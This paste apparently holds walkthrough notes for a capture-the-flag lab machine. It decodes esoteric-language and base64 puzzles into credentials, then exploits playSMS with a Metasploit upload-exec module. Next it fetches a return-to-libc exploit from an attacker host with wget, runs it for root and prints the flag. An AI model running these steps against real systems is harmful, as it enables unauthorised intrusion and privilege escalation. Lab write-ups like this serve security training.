Advertisement
Guest User

Untitled

a guest
Nov 28th, 2018
139
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.86 KB | None | 0 0
  1. if ( username == "admin" && password == "superduperlooperpassword_lol"){
  2.  
  3.  
  4. DECODE
  5. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?.
  6.  
  7. DECODE
  8. {p:7901324502264899236349230781143813838831920474669364339844939631481665770635584819958931021644265960578585153616742963330195946431321644921572803658406281,q:12802918451444044622583757703752066118180068668479378778928741088302355425977192996799623998720429594346778865275391307730988819243843851683079000293815051,dp:5540655028622021934429306287937775291955623308965208384582009857376053583575510784169616065113641391169613969813652523507421157045377898542386933198269451,dq:9066897320308834206952359399737747311983309062764178906269475847173966073567988170415839954996322314157438770225952491560052871464136163421892050057498651,c:62078086677416686867183857957350338314446280912673392448065026850212685326551183962056495964579782325302082054393933682265772802750887293602432512967994805549965020916953644635965916607925335639027579187435180607475963322465417758959002385451863122106487834784688029167720175128082066670945625067803812970871}
  9.  
  10.  
  11. DECODE BASE64 INTO A ZIP FILE
  12. UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA
  13.  
  14.  
  15. USE FCRACKZIP TO CRACK THE ZIP FILE PASSWORD
  16. username = admin && password = superduperlooperpassword_lol
  17.  
  18.  
  19. DECODE BASE64
  20. KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
  21.  
  22. KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
  23.  
  24. K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
  25.  
  26. LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==
  27.  
  28.  
  29. DECODE BRAINFUCK ESOTERIC PROGRAMMING LANGUAGE
  30. +++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
  31. ++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
  32. <]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
  33. ++..<
  34.  
  35. idkwhatispass
  36.  
  37.  
  38.  
  39. http://10.10.10.111:9999/playsms
  40. Login is admin
  41. pass is idkwhatispass
  42.  
  43. Us metasploit module exploit/multi/http/playsms_uploadcsv_exec
  44.  
  45.  
  46. Name Current Setting Required Description
  47. ---- --------------- -------- -----------
  48. PASSWORD idkwhatispass yes Password to authenticate with
  49. Proxies no A proxy chain of format type:host:port[,type:host:port][...]
  50. RHOST 10.10.10.111 yes The target address
  51. RPORT 9999 yes The target port (TCP)
  52. SSL false no Negotiate SSL/TLS for outgoing connections
  53. TARGETURI /playsms/index.php?app=main&inc=feature_sendfromfile&op=list yes Base playsms directory path
  54. USERNAME admin yes Username to authenticate with
  55. VHOST no HTTP server virtual host
  56.  
  57. RUN THIS COMMAND TO FIND LIBC ADDRESS
  58.  
  59. GET SYSTEM OFFSET
  60. readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
  61. 1457: 0003ada0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
  62.  
  63. GET EXIT OFFSET
  64. readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
  65. 141: 0002e9d0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
  66.  
  67. strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
  68. 15ba0b /bin/sh
  69.  
  70. GET ARGUMENT
  71. strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
  72. 15ba0b /bin/sh
  73.  
  74. LIBC LOCATION
  75. ldd rop | grep libc
  76. libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
  77.  
  78. DOWNLOAD EXPLOIT TO FROLIC
  79. python -m SimpleHTTPServer
  80. wget http://10.10.14.5:8000/ropExploit/py
  81.  
  82. RUN EXPLOIT
  83. cd /home/ayush/.binary
  84. ./rop $(python /var/www/html/ropExploit.py
  85.  
  86. PWN ROOT
  87. cd root
  88. cat root.txt
  89. 85d3fdf03f969892538ba9a731826222
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement